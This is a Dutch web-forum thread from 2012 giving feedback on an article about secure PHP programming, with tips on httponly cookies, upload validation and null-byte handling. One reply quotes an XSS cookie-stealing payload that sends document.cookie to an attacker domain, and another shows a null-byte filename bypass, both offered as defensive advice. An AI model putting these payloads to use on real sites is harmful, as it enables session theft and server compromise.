Beste SiteDealers,
Ik heb zojuist een artikel op mijn website geschreven met een paar tips over hoe veilig en efficiënt te programmeren. Het is natuurlijk niet volledig, maar het zijn een aantal tips die ik in een artikel wou zetten om mijn website wat uit te breiden.
Graag wil ik weten wat jullie van de tips vinden, of jullie misschien op-, of aanmerkingen hebben en misschien kritiek.
Het artikel is hier te vinden: http://is.gd/A22WOL
M.V.G.
Damiaan Reijnaers
-
19-12-2012, 17:12 #1
Particulier
- Berichten
- 533
- Lid sinds
- 16 Jaar
Feedback over artikel hoe (veilig en efficient) PHP te programmeren
-
19-12-2012, 18:28 #2
Particulier
- Berichten
- 750
- Lid sinds
- 15 Jaar
Re: Feedback over artikel hoe (veilig en efficient) PHP te programmeren
Nog een paar tips
Cookies zijn beter te beveilingen door httponly te gebruiken mocht er toch nog ergens een cross site scripting lek in je code in zitten dan kunnen ze tenminste niet door middel van window.location="http://evil-domain.nl/index.php?c=document.cookie" je cookie stelen
Niet zo maar een upload script vanaf internet gebruiken vaak zwaar onveilig aangezien deze vaak op mime types of extensies checkt.
Deze waarden zijn makkelijk om aan te passen via curl.
Bovendien is hè raadzaam om het geuploaded bestand in te lezen om html en php tags te strippen aangezien een image geïnjecteerd kan worden met html en php code.
Helemaal safe is het om de php parser uit te zetten in de dir waar de afbeeldingen uiteindelijk komen te staan
Ook een linke een NULL byte wellicht minder bekent onder de php programmeurs maar aangezien ik ook c kan programmeren weet ik van deze zwakheid af. In c betekend een null byte de string einde. De meeste Disk io functies van php zoals include zijn vatbaar hiervoor
Dus image.php%00.jpg wordt in de include gezien als image.php
Dus altijd een str_replace uitvoeren om de null byte te replacen.Laatst aangepast door Raymond Nijland : 19-12-2012 om 18:38
-
19-12-2012, 18:37 #3
Particulier
- Berichten
- 2.392
- Lid sinds
- 17 Jaar
Re: Feedback over artikel hoe (veilig en efficient) PHP te programmeren
Niet alleen includes, maar ook opslaan van bestanden. Met een nullbyte kun je op die manier vaak de validatie van bestanden omzeilen lol.
Controleren op een cijfer (ID)? Gebruik ctype_digit.
Dit is trouwens vrij basis (hoewel het voor sommigen al nieuw zal zijn..) maar vind het artikel wel wat karig om eerlijk te zijn. Je gaat er onwijs snel doorheen zonder echt concrete voorbeelden te geven.
-
19-12-2012, 18:46 #4
Particulier
- Berichten
- 750
- Lid sinds
- 15 Jaar
Re: Feedback over artikel hoe (veilig en efficient) PHP te programmeren
Klopt ik gaf include als een makkelijk voorbeeld maar de gevaarlijkste naar mijn menig is toch wel is dat move_uploaded_file ook vatbaar is
Om maar eens goed te benadrukken dat een niet 100% veilige upload not done is dan kun je net zo goed direct je FTP gegevens op een forum plaatsen.
